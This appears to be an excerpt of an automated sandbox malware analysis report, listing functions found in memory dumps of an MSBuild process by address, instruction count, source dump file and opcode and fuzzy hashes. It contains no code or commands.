                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: b602d459938a320161cb86f4ebf195953c8a7b4d33c005e9114c588b58257d9b
                                                                                                                                                                                                                                                • Instruction ID: 04d1af3141447ff4d887dddb3b9b303c5724a09d4bbc0a1696809cb5f00e1189
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b602d459938a320161cb86f4ebf195953c8a7b4d33c005e9114c588b58257d9b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 07419F30B00204AFDB54CF68D954EAABBF6FF89711B1580AAE505DF3A2CA31DD05CB61
                                                                                                                                                                                                                                                Function 071BC550 Relevance: .1, Instructions: 135COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 4306509159da872e0306ae5a21d2c743d89f3fb575fb342e4d1fb2669541ef45
                                                                                                                                                                                                                                                • Instruction ID: a7cafe2e7b19e668ff56bf3eb1649f10268e4dc2cc9f27691c5868805a7c1aee
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4306509159da872e0306ae5a21d2c743d89f3fb575fb342e4d1fb2669541ef45
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6741B576700209AFCF12DFA4E8408FF7BBAEF89211B048066EA15C7251DB31DD25DBA1
                                                                                                                                                                                                                                                Function 070970A7 Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 48279d72b0c8bb71ded93fe18c19022336929d7e665f24383787c85ace620a34
                                                                                                                                                                                                                                                • Instruction ID: 2ad63df021a9f0d51b94897d81dc55f5f73924e35f39bcb5736b9433e173d94a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 48279d72b0c8bb71ded93fe18c19022336929d7e665f24383787c85ace620a34
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 30416771200305AFD315EB30D894A6ABBE3FBC5220F148A28D54A8B691DF75FD0A8F91
                                                                                                                                                                                                                                                Function 071B68A8 Relevance: .1, Instructions: 130COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 8e7fc5b74c7a08bea48081442c758e36ceb1ca1116348b8af5ce1b6e0bf03b5c
                                                                                                                                                                                                                                                • Instruction ID: 64f976096142c416e350854ca68b2a1353ade8ee438f25d63ea31b40b32894aa
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e7fc5b74c7a08bea48081442c758e36ceb1ca1116348b8af5ce1b6e0bf03b5c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 70516FB4A00705DFCB05DF68C48099ABBF2FF89320B1586A9D4599B362DB30ED45CF91
                                                                                                                                                                                                                                                Function 07093B77 Relevance: .1, Instructions: 125COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 0158876a6e1117e8c86d6be72f8a652668f66346e27e953d5987875b8e88f012
                                                                                                                                                                                                                                                • Instruction ID: 2f36cc4937da980ce302777f561e549f744bb1a29ad4b728bbbb92acb3e38c06
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0158876a6e1117e8c86d6be72f8a652668f66346e27e953d5987875b8e88f012
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C41C0B160E3D16FE703AB7998A46D57FB1AF83214F0A01DBD4808F193D5149C49DBAB
                                                                                                                                                                                                                                                Function 072A2A30 Relevance: .1, Instructions: 122COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: cc3488732b790eb0aa6dea0b85d717cbe64dfd960bc861b6bf45af56812f63ff
                                                                                                                                                                                                                                                • Instruction ID: 79a8f2278e2fd5b46cf3077eea283edc41e78bfb1a607b8c24dd3700e5affd0e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cc3488732b790eb0aa6dea0b85d717cbe64dfd960bc861b6bf45af56812f63ff
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 33419372B143469FD721DB68D840AABB7A6EFC5320B108467D646DB242DB30ED11CBA1
                                                                                                                                                                                                                                                Function 072A0006 Relevance: .1, Instructions: 121COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 76247044f3fddffa5a5c5a43b4bf97cd107a5390bc64049d425116f2a1105ea3
                                                                                                                                                                                                                                                • Instruction ID: caeb8977a366d3b78b7ffb82f99a9415a9e5bddc196a0b74b732e59a7794b056
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 76247044f3fddffa5a5c5a43b4bf97cd107a5390bc64049d425116f2a1105ea3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 64518AB4900259DFDB61DF64D850AD9BBF2FF89310F0441EAC408AB251EB321E95CF94
                                                                                                                                                                                                                                                Function 071BDE70 Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 5f0c7f330bf9c5b676fafb1334557db6c6b4423b7771f1ad1add48191433ae63
                                                                                                                                                                                                                                                • Instruction ID: 23bb5d0a8d889c36ccd227fd804486ae0bb1776ecf16d7d16f7d105754d5ec69
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5f0c7f330bf9c5b676fafb1334557db6c6b4423b7771f1ad1add48191433ae63
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E4127B43046009FC728CF69D48896AB7F6BF89310B1545ADE58ACB7B5CB34EC81CB40
                                                                                                                                                                                                                                                Function 070970D0 Relevance: .1, Instructions: 118COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 7f3dd5e6d1f2a79d95716260c0303522a25e2aa7236afe9cf9c8cddf59529183
                                                                                                                                                                                                                                                • Instruction ID: affb6792bbfb59dc77635e1b60777dc6bb80ec6d4ccfbb1c34d496d53dd0892d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7f3dd5e6d1f2a79d95716260c0303522a25e2aa7236afe9cf9c8cddf59529183
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C3415775200305AFD315EB70E894A6AB7E3FBC8221B148A28D5468B781DF71FD0A8F91
                                                                                                                                                                                                                                                Function 072AE74F Relevance: .1, Instructions: 117COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 5f6914a04e0965a49adfa8ae6dfeff3a994f904eea606e2e5cdff70d6aca79f2
                                                                                                                                                                                                                                                • Instruction ID: dfd80f1aa360458f5333730e65e186a1361ba3b37da5d8608aec234c3bac129a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5f6914a04e0965a49adfa8ae6dfeff3a994f904eea606e2e5cdff70d6aca79f2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5651E774E10209EFDB05CFA8D484A9DFBB2FF48314F298558E405AB365C771AD82CB94
                                                                                                                                                                                                                                                Function 071B6FA0 Relevance: .1, Instructions: 116COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 2f246b9bc04f185d6445d560509ec6a1a461acb4675388f8b90d5a8833780c6f
                                                                                                                                                                                                                                                • Instruction ID: ea913760f3d90d87c754337fc9a18f8f419d082eaba2fd7931000496a07bf9fe
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2f246b9bc04f185d6445d560509ec6a1a461acb4675388f8b90d5a8833780c6f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC3159B17047045F9324DB69D440AAFB7E6EFC96B1314862AE809DB380CF31ED0687D5
                                                                                                                                                                                                                                                Function 07090698 Relevance: .1, Instructions: 112COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: fbc36fe50bcb92e7734da23226a1bfe8ad7597988eb4e05e502a6e09bac15e63
                                                                                                                                                                                                                                                • Instruction ID: c0c352fc761a6209c4c754f47308db834beeeefab84c7230097e1e38aedbeb06
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fbc36fe50bcb92e7734da23226a1bfe8ad7597988eb4e05e502a6e09bac15e63
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D4193B4E01219DFDB54DFA9D884ADDFBB2BF89310F10816AE505AB364DB34A841CF90
                                                                                                                                                                                                                                                Function 070960D8 Relevance: .1, Instructions: 112COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 54ddc8ccfc68ca6d1fc072d88a3311a4080ae420dd8bee5ad1217b5d8fefadb0
                                                                                                                                                                                                                                                • Instruction ID: 387d56a40c5d6a390fec01c240e4d0e17952c7a4d4409616dbc47c08ce7a9d72
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54ddc8ccfc68ca6d1fc072d88a3311a4080ae420dd8bee5ad1217b5d8fefadb0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 89412BB02107016FD395EF65D890A9AB7E2BFC1720F548A5CC1468F651DB71BD088F95
                                                                                                                                                                                                                                                Function 072AACF0 Relevance: .1, Instructions: 110COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d52f74c31fe0c7b1b1f84472fdb705291003e97dccd24bda36807d7ac5937860
                                                                                                                                                                                                                                                • Instruction ID: 47dc19afd940a93c228047758c13c7f95746c9612c89820a1f0b1aecabc49112
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d52f74c31fe0c7b1b1f84472fdb705291003e97dccd24bda36807d7ac5937860
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D41A2F1A20719DFC724DB29C9406AE73F2BF88610B00862AC5469B654DF70DD01CFD1
                                                                                                                                                                                                                                                Function 070914D0 Relevance: .1, Instructions: 108COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 5d04a23232276485d8598c22041a1e98fe55848d22159fc50606ca070c623f80
                                                                                                                                                                                                                                                • Instruction ID: 4e5b59190741025ce337a93b1d72d33a37c825791f2210fda515072cd37e945c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d04a23232276485d8598c22041a1e98fe55848d22159fc50606ca070c623f80
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C741F0B4E01219DFDF58DFA9C584AEDBBB2BF89300F148129D412AB254DB349942CF55
                                                                                                                                                                                                                                                Function 071BEDD0 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 09f34d6c428476b392d1b96de763a6956d442a508ca0de4a750c31e64cf17f5f
                                                                                                                                                                                                                                                • Instruction ID: 67270f9c615c32e47b05b1cc7988d5f75231ba59ad43ad0c58bed5de717abd24
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 09f34d6c428476b392d1b96de763a6956d442a508ca0de4a750c31e64cf17f5f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6831BFB5B102128FCB18EFB5C4955EEBBF2AF88210F114669D40A9B391DB34ED05CB91
                                                                                                                                                                                                                                                Function 0709E6AA Relevance: .1, Instructions: 104COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 278b18fd0c871a823856431d9729ae6b950f8f34813507a4953cd611cfa827e5
                                                                                                                                                                                                                                                • Instruction ID: 28336329e5d2b9db592ef0bcbfc9fff7a92c247f5721303bc42200a86a0d0a55
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 278b18fd0c871a823856431d9729ae6b950f8f34813507a4953cd611cfa827e5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E3415B757003519FDB15DF34D8849AABBB6FF85310B148169E906CB395DB31ED01CBA1
                                                                                                                                                                                                                                                Function 072ADD7B Relevance: .1, Instructions: 100COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 4fa4e01d1c634a68f6b070bb4457dda2943b3fe2d3bed26dc4d5af52a21d04a0
                                                                                                                                                                                                                                                • Instruction ID: 3eda9b5ef657ceb610f26a54b3a9c6096595a575923b5a8503d2145773388488
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4fa4e01d1c634a68f6b070bb4457dda2943b3fe2d3bed26dc4d5af52a21d04a0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7341E4B4A11209EFDB04CBA8D584A9DFBF2AF48314F24C158E414AB365C771ED82CF80
                                                                                                                                                                                                                                                Function 072AF1E0 Relevance: .1, Instructions: 98COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: e76f573acf19e157b2a045a14b9666f9d9416d10c163b453b9642a8e7ce0f30d
                                                                                                                                                                                                                                                • Instruction ID: cf5fe04fc3d4d32ba1fc5f9e9694c04e4ae1d4397af4736f5d1a4a6f6c9a45ef
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e76f573acf19e157b2a045a14b9666f9d9416d10c163b453b9642a8e7ce0f30d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A63178F1B242A3BFCB1A9B7584106BF7FF2AF86300B14456AD442DB281DB7AC905C391
                                                                                                                                                                                                                                                Function 0709E6B8 Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: f3653aaf34f67761e0bb5cd91b542476ec2719d9fb231d8dc2bcd83f79d47e8c
                                                                                                                                                                                                                                                • Instruction ID: fe86df2222993c0243380391260d6da69f2439f1afa3df4c4b7cd6c15e25a4c6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f3653aaf34f67761e0bb5cd91b542476ec2719d9fb231d8dc2bcd83f79d47e8c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 51314875700215AFDB55DF34D8849AEBBB6FF89310B108269EA06CB395DB31ED01CBA1
                                                                                                                                                                                                                                                Function 07091300 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 001a30f09903c55cfb98dff8eea1c321c6c20ca34b8b9b46c7fd32b0de86113c
                                                                                                                                                                                                                                                • Instruction ID: 8e04e09f89bdfd3be1c7f9bc3918e00cb7d8d402604e3e5b17ff25f3aee36cdb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 001a30f09903c55cfb98dff8eea1c321c6c20ca34b8b9b46c7fd32b0de86113c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EF31D678A11219DFCB05EFA9E8549AEBBB2FF89300F204129E605A7354DB306D01DFA1
                                                                                                                                                                                                                                                Function 072AB6A1 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: e03650065d5fd6276ef10be306fefa52f441a4485a61dddc7d329b443dd5dbff
                                                                                                                                                                                                                                                • Instruction ID: 366650235f04c43f9d2bdb4b22b345e4e4be6a80ce2b999759b348e8553ef775
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e03650065d5fd6276ef10be306fefa52f441a4485a61dddc7d329b443dd5dbff
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F031D5F66201469FDB24DB28CA914BE7BF2BF4531071945AAC446DB2A2CB30ED44CB51
                                                                                                                                                                                                                                                Function 07096678 Relevance: .1, Instructions: 90COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 0523215b1c18034f16f469fe6402948619c36f9eb44e39c3abdc01c03d1eeda9
                                                                                                                                                                                                                                                • Instruction ID: e98ba23c494a23af999311bf41e3798c1b12ab0270bbec919d1e4982b4b93c31
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0523215b1c18034f16f469fe6402948619c36f9eb44e39c3abdc01c03d1eeda9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40214F303003052BE755AA329891B7E67A7EFC1A71F48882CD5038F1C4DE72AD4A9B96
                                                                                                                                                                                                                                                Function 072A79B0 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 98595758a13f3c5f4c606ed884c5e546b6efbc0cebe0f621a586894c08364927
                                                                                                                                                                                                                                                • Instruction ID: 83ac38d5393816615ff9b217f9c772aaab78b544759fd0893a24b9413e772078
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 98595758a13f3c5f4c606ed884c5e546b6efbc0cebe0f621a586894c08364927
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF218376314205BFDB00CF94D884DAABBEAFB8C361B148076FA09CB221D772D901DB94
                                                                                                                                                                                                                                                Function 071B0040 Relevance: .1, Instructions: 86COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
